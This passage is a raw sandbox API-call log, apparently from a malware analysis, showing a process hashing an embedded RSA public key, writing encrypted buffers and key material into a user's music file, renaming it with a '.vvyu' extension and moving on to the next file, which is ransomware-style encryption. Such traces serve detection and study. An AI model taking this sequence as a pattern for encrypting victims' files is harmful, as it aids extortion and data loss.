KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.446] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.447] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.447] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.447] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.447] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.447] GetLastError () returned 0x0 [0197.447] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.447] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.448] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.448] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.448] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbd80) returned 0x2af5168 [0197.448] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea770 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea7b8 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.449] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae67a0 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.453] GetCurrentThreadId () returned 0x5d8 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af28a0 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.454] GetCurrentThreadId () returned 0x5d8 [0197.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea7b8 | out: hHeap=0x2c0000) returned 1 [0197.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.465] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xbd74, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xbd74, lpOverlapped=0x0) returned 1 [0197.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.466] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbd79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.466] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.467] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.468] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.468] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.468] CloseHandle (hObject=0x584) returned 1 [0197.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0197.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.472] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\c-p32.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\c-p32.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\c-p32.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\c-p32.m4a.vvyu")) returned 1 [0197.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.477] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0197.480] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1549d40, ftCreationTime.dwHighDateTime=0x1d89ea3, ftLastAccessTime.dwLowDateTime=0x251be1c0, ftLastAccessTime.dwHighDateTime=0x1d8a313, ftLastWriteTime.dwLowDateTime=0x251be1c0, ftLastWriteTime.dwHighDateTime=0x1d8a313, nFileSizeHigh=0x0, nFileSizeLow=0xadfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fwWKBmZrXnqYjnf.mp3", cAlternateFileName="FWWKBM~1.MP3")) returned 1 [0197.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0197.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.482] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\fwWKBmZrXnqYjnf.mp3") returned=".mp3" [0197.482] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\fwWKBmZrXnqYjnf.mp3" (normalized: 